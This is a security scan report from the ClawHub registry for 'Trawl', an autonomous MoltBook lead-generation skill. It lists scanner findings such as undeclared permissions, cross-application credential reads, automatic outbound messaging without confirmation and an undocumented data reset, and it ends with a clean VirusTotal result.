ClawHub

Trawl

Security checks across malware telemetry and agentic risk

Overview

Trawl is a clearly disclosed autonomous MoltBook lead-generation skill, but users should treat it as account automation that can contact other people when run live.

Install only if you intentionally want autonomous MoltBook lead outreach using your account. Start with sweep.sh --dry-run, review the DM template and scoring thresholds, keep auto_approve_inbound false until you are comfortable with the workflow, keep max_new_dms_per_sweep conservative, and treat ~/.config/trawl reports as private lead/contact data.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (17)

Lp3

Medium
Category
MCP Least Privilege
Confidence
86% confidence
Finding
The skill documentation instructs users to run shell scripts and connect to an external service, but the skill metadata does not declare corresponding permissions or capabilities. This creates a transparency and consent gap: a user or platform may invoke or trust the skill without realizing it performs networked automation and local command execution.

Description-Behavior Mismatch

Medium
Confidence
93% confidence
Finding
The script implements a destructive reset operation that clears leads, seen posts, conversations, sweep logs, and deletes the last report, but this capability is omitted from the top-of-file usage documentation. Hidden destructive behavior increases the chance of accidental or unexpected data loss, especially when this script is used by agents or operators relying on the documented interface.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
A lead-management action unexpectedly reads credentials from a separate local secrets file and performs a remote API approval when a user selects PURSUE for an inbound lead. This creates side effects beyond local state management and can approve external conversations without clear user awareness, which is risky in an autonomous lead-generation context.

Intent-Code Divergence

Low
Confidence
84% confidence
Finding
The file header documents list/get/update/decide/archive/stats but omits reset, even though reset clears multiple datasets and removes a report file. This mismatch is dangerous because operators may assume the script is non-destructive based on the documented interface and accidentally trigger broader deletion behavior.

Intent-Code Divergence

Medium
Confidence
98% confidence
Finding
The script's dry-run path still calls update_lead_state and changes persistent lead state from DM_REQUESTED to QUALIFYING. That violates operator expectations for a non-mutating simulation mode and can cause workflow corruption, skipped approval steps, or unintended follow-on actions in later runs.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
This script reads credentials from $HOME/.clawdbot/secrets.env, an unrelated external bot directory, creating implicit trust and cross-application secret sharing. That broadens the attack surface: compromise or tampering in another tool's config can influence this script's authentication and network behavior without the user's knowledge.

Vague Triggers

Medium
Confidence
69% confidence
Finding
The description is broad and action-oriented, covering setup, sweeps, lead management, and autonomous business-development workflows. Overly generic invocation language can cause the skill to trigger in situations where the user did not intend outbound networking or DM handling, which is risky for an autonomous messaging tool.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The skill advertises autonomous outbound and inbound DM processing without a prominent warning about privacy, reputation, consent, and account-activity consequences. Because it can message third parties and handle inbound conversations on the user's behalf, unclear disclosure increases the chance of unintentional spam, data sharing, or policy violations.

Missing User Warnings

High
Confidence
97% confidence
Finding
Documenting `auto_approve_inbound: true` without a safety warning is dangerous because it allows unsolicited inbound contacts to be automatically accepted and advanced into qualification flows. That can enable spam amplification, social engineering, unauthorized engagement, and accidental disclosure to unvetted agents.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The configuration enables automated outbound DMs using a templated intro and qualifying flow, but this file provides no explicit human-review gate, consent check, or user-facing warning before initiating contact. In an autonomous lead-generation skill, that materially increases the risk of spam, impersonation of the human principal, harassment, and reputational damage if the agent contacts unintended recipients at scale.

Missing User Warnings

Low
Confidence
86% confidence
Finding
The interface explicitly exposes outbound engagement primitives (`sendDM`, `replyToDM`, `commentOnPost`) for an autonomous lead-generation skill, but the contract does not require any consent, disclosure, approval, rate-gating, or policy checks before contacting third parties. In this context, that omission materially increases the risk of unsolicited outreach, spam, impersonation, and reputational harm because implementers can wire direct messaging into automation without any built-in safeguard or user warning.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The script accesses a local secrets file to obtain MOLTBOOK_API_KEY without prior disclosure in the command interface or documentation. Undisclosed credential access is risky because users may invoke a seemingly local lead-management command without realizing it consumes sensitive credentials from another application's storage.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The script performs an outbound approval request to the MoltBook API as part of a local decision command, but this network side effect is not clearly disclosed. In this skill, approving inbound DMs changes external system state and could authorize conversations unintentionally if operators think they are only updating a local lead database.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The script prints personally identifiable and profile-derived data such as names, handles, bios, agent descriptions, post titles, and direct profile URLs to stdout without any privacy warning, minimization, or redaction. In the context of an autonomous lead-generation skill that processes social-network contacts, this increases the risk of unnecessary exposure through terminal logs, shell history capture, CI logs, screen sharing, or forwarding of generated reports.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The script can automatically approve inbound DM requests based solely on configuration, causing the agent to accept external conversations without an explicit confirmation at the moment of action. In a lead-generation skill, this creates a real consent and trust-boundary risk because outside parties can initiate interactions that the agent immediately accepts, potentially enabling spam, social engineering, or unwanted business communications.

Missing User Warnings

Medium
Confidence
97% confidence
Finding
The script automatically sends outbound DM requests to scored leads with no interactive confirmation before contacting external parties. Because this skill is specifically designed for autonomous lead generation, the behavior is more dangerous in context: it can generate unsolicited outreach at scale, creating spam, reputation, compliance, and abuse risks if configuration or scoring is wrong.

Autonomous Decision Making

Medium
Category
Excessive Agency
Content
- Creates lead as INBOUND_PENDING
- Reports to you for approval
- `leads.sh decide <key> --pursue` approves the DM and starts qualifying
- Or set `auto_approve_inbound: true` in config to auto-accept all

## Reports
Confidence
94% confidence
Finding
auto_approve

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal